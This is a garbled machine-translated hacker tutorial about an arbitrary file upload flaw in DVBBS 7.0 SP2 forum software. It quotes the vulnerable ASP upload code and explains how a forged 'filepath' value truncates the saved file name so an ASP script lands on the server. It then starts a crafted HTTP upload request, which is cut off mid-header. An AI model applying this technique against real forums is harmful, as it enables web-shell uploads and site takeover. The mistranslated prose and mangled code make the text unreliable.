Attack | Upload recently a period of time relatively busy, no time for the organization to make contributions (really is no strength, hehe). Just a little while ago. * * Daner's "current popular BBS security comparison", please refer to: http://wvw.ttian.net/forum/ viewtopic.php?id=269) to persuade the network forum out of an upload arbitrary file loopholes, at that time did not understand how. But I see the recent NB Forum in the discussion of the issue of this aspect, the study, found that the loophole is really there, and very serious, with small * The word is DVBBS7.0 SP2. Although some people already know the method of attack, there are still some problems. I will explain this loophole of the net. (I don't know if it will be scolded because it's too big a loophole).
We first look at the Moving Network forum upload files related code:
' =========== no component upload (UPLOAD_0) ====================
Sub Upload_0 ()
Set upload=new upfile_class ' Build upload Object
Upload. GetDate (int (forum_setting (56)) *1024) ' Get uploaded data, unlimited size
Icount=0
If Upload.err > 0 Then
Select Case Upload.err
Case 1
Response.Write "Please select the file you want to upload first [<a href=# onclick=history.go ( -1) > re-upload </a>]"
Case 2
Response.Write "Picture size exceeds Limit" &forum_setting & "K [<a href=# onclick=history.go ( -1) > re-upload </a>]"
End Select
Exit Sub
Else
Formpath=upload.form ("filepath")
"Add (/) to the directory
If Right (formpath,1) <> "/" Then formpath=formpath& "/"
For every formName in Upload.file ' lists all uploaded files
Set File=upload.file (formName) ' generates a File object
If File.filesize<100 Then
Response.Write "Please select the picture you want to upload first [<a href=# onclick=history.go ( -1) > re-upload </a>]"
Response.End
End If
Fileext=lcase (file. Fileext)
If Checkfileext (fileext) =false Then
Response.Write "file format is incorrect [<a href=# onclick=history.go ( -1) > re-upload </a>]"
Response.End
End If
Randomize
Rannum=int (90000*RND) +10000
Filename=formpath&year (now) &month-&day (now) &hour (now) &minute (now) &second (now) & rannum& "." &fileext
If file. Filesize>0 Then ' if FileSize > 0 indicates file data
File. SaveToFile server.mappath (filename) ' Save file '
' Response.Write file. Filepath&file. filename& "(" &file. filesize& ") =>" &formPath&File.FileName& "Success!<br>"
Response.Write "<script>parent.document. Forms[0].myface.value= ' "&FileName&" ' </script> "
Icount=icount+1
End If
Set file=nothing
Next
Set upload=nothing
Session ("upface") = "Done"
Htmend icount& "File Upload end!"
End If
End Sub
In the above code you can see this sentence:
Filename=formpath&year (now) &month-&day (now) &hour (now) &minute (now) &second (now) & rannum& "." &fileext
Here, filename is the name of the file that was saved, and it was named according to the time of the upload, the last extension is the extension of the file that is submitted in the form. However, there are restrictions on the type of file submitted in the program, and obviously it is not feasible to upload ASP files directly. But let's take a look at the basis for the suffix. ? We can find this code in the reg_upload.asp:
<form name= "form" method= "POST" action= "upfile.asp" enctype= "Multipart/form-data" >
<input type= "hidden" name= "filepath" value= "Uploadface" >
<input type= "hidden" name= "act" value= "upload" >
<input type= "File" name= "File1" >
<input type= "hidden" name= "fname" >
<input type= "Submit" "name=" submit "value=" Upload "onclick=" fname.value=file1.value,parent.document. Forms[0]. Submit.disabled=true,
Parent.document. Forms[0]. Submit2.disabled=true; " >
</form>
In this way, we know that the program is to extract the File1 form and fname the values in the form to make a judgment. That is, it's not going to be possible to submit our ASP files directly from the page, but It would be different if we built the packet ourselves. The wing of Lust proposes a method of constructing a data packet to achieve deceptive purposes. Change the value of the submitted File1 form and fname table items to a valid file name. This allows you to bypass the detection of file types.
Of course, the main problem is not here, if we just want to upload the code, we can simply change the file name. Our goal is to change the file name we uploaded to ASP so that we can use it. The key is in this sentence:
Formpath&year (now) &month (now), &day (now), &hour (now) &minute (now) &second & "." &fileext
This sentence merges a string of strings together. What we can change is formpath this parameter. The key to detecting a string in your computer is to see if the ' "is ' character is encountered, and if so, the string is ended. That is, when we construct an upload file to save the path, just trick the computer so that he thinks it's similar. Uploadface\zwell.asp "Such a path parameter is over, so that we can not do a series of time characters, so as to save the file directly to the file name we defined. Because, what we're going to do is in the constructed packet, Change the filepath in the form to a string similar to Uploadface\zwell.asp ' "and send it out.
Let's take a look at the format of the packet (the forum seems to be using Wsockexpert, but I use iris, I feel more professional, ^_^):
Post/forum/upfile.asp http/1.1
Accept:image/gif, Image/x-xbitmap, Image/jpeg, Image/pjpeg, Application/x-shockwave-flash, */*
Referer:http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp
Accept-language:zh-cn
Content-type:multipart/form-data; boundary=---------------------------7d4a325500d2
Accept-encoding:gzip, deflate
user-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2. NET CLR 1.1.4322;. NET CLR 1.0.3705)
Host:uyee.com
content-length:1593
Connecti
